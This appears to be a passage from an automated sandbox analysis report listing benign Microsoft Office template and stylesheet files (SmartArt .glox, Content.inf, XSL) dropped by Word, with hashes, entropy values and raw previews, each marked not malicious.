                                                                                    SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                    SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE490.tmp\ThemePictureAlternatingAccent.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):5630
                                                                                    Entropy (8bit):7.87271654296772
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                    Malicious:false
                                                                                    Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4A3.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):290
                                                                                    Entropy (8bit):3.5161159456784024
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                    SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                    SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                    SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4A3.tmp\turabian.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):344303
                                                                                    Entropy (8bit):5.023195898304535
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                    MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4B4.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):290
                                                                                    Entropy (8bit):3.5081874837369886
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                    SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                    SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                    SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4B4.tmp\gostname.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):255948
                                                                                    Entropy (8bit):5.103631650117028
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                    MD5:9888A214D362470A6189DEFF775BE139
                                                                                    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4B5.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):280
                                                                                    Entropy (8bit):3.484503080761839
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                    MD5:1309D172F10DD53911779C89A06BBF65
                                                                                    SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                    SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                    SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4B5.tmp\InterconnectedBlockProcess.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):9191
                                                                                    Entropy (8bit):7.93263830735235
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                    Malicious:false
                                                                                    Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4C5.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):238
                                                                                    Entropy (8bit):3.472155835869843
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                    MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                    SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                    SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                    SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4C5.tmp\rings.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):5151
                                                                                    Entropy (8bit):7.859615916913808
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                    Malicious:false
                                                                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4C6.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):258
                                                                                    Entropy (8bit):3.4692172273306268
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                    MD5:C1B36A0547FB75445957A619201143AC
                                                                                    SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                    SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                    SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4C6.tmp\pictureorgchart.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):7370
                                                                                    Entropy (8bit):7.9204386289679745
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                    MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                    Malicious:false
                                                                                    Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4D7.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):262
                                                                                    Entropy (8bit):3.4901887319218092
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                    MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                    SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                    SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                    SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4D7.tmp\RadialPictureList.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):5596
                                                                                    Entropy (8bit):7.875182123405584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                    MD5:CDC1493350011DB9892100E94D5592FE
                                                                                    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4D8.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):260
                                                                                    Entropy (8bit):3.4895685222798054
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                    MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                    SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                    SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                    SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4D8.tmp\VaryingWidthList.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):3075
                                                                                    Entropy (8bit):7.716021191059687
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                    MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                    Malicious:false
                                                                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE4D9.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):252
                                                                                    Entropy (8bit):3.4680595384446202
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                    MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                    SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                    SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
